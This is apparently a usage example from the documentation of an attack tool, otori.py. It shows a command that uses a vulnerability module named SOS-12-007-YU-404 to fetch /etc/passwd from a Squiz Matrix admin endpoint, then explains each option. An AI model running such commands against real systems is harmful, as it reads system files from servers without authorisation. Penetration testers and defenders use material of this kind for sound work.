python ./otori.py --clone --module "SOS-12-007-YU-404" --singleuri "file:///etc/passwd" --module-options "http://squiz.local/_admin/" --outputbase "./output" --retries 3

Clone the single file /etc/passwd from the target Squiz Matrix system accessible at http://squiz.local/_admin/.

Write all output into a subdirectory of "output" within the current working directory.

Retry up to 3 times, if the type of failure is one that is likely to succeed on retry.